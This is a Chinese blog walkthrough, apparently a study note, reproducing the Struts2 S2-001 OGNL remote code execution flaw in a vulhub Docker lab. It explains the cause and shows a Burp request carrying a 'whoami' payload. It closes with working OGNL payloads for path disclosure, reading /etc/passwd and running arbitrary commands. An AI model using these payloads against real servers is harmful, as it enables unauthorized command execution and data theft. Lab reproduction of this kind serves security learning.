struts2(s2-001)远程代码执行漏洞docker&&vulhub复现

本文仅作为个人学习记录及学习交流,禁止用于非法活动
《中华人民共和国网络安全法》

原理

因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行

环境准备

1、Centos 7
2、docker(保证已开启)
3、vulhub靶场

复现

一、服务搭建

1、进入vulhub中s2-001所在目录

/usr/vulhub/struts2/s2-001(根据vulhub个人安装目录自行调整)

![在这里插入图片描述](https://img-blog.csdnimg.cn/104a3f9992d34ab6828ccd1a984a6b01.png

2、查看漏洞说明

cat README.zh-cn.md (README.md为英文版)

![在这里插入图片描述](https://img-blog.csdnimg.cn/19f6a260199e4d56b8c1b8b36ed858f5.png

3、docker容器启动

docker-compose up

![在这里插入图片描述](https://img-blog.csdnimg.cn/88a88af720f14b7ca3c052d917ab21ca.png

4、查看docker进程,确定服务端口

docker ps

在这里插入图片描述端口为8080

二、漏洞测试

1、访问http://192.168.92.138:8080/

ip:8080

![在这里插入图片描述](https://img-blog.csdnimg.cn/0effb3b01ad8439093cdae2655f3f4db.png

2、输入账号密码,brup抓包

在这里插入图片描述发送到repeter
password字段改为payload

%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D

发包后返回命令执行结果

![在这里插入图片描述](https://img-blog.csdnimg.cn/cfdee0a23925425fb59da6158a4f88cb.png

POC && EXP

获取tomcat执行路径:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获取Web路径:

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

执行任意命令(命令加参数:new java.lang.String[]{"cat","/etc/passwd"}):

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
posted @   vayenv  阅读(66)  评论(0编辑  收藏  举报  
相关博文:
·  Centos7环境下Docker搭建vulhub
·  文件上传漏洞原理、防御、绕过
·  S2-001 远程代码执行漏洞
·  S2-007 远程代码执行漏洞
·  Vulhub 漏洞学习之:Strust2
阅读排行:
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 25岁的心里话
· 按钮权限的设计及实现
点击右上角即可分享
微信分享提示
AI IDE Trae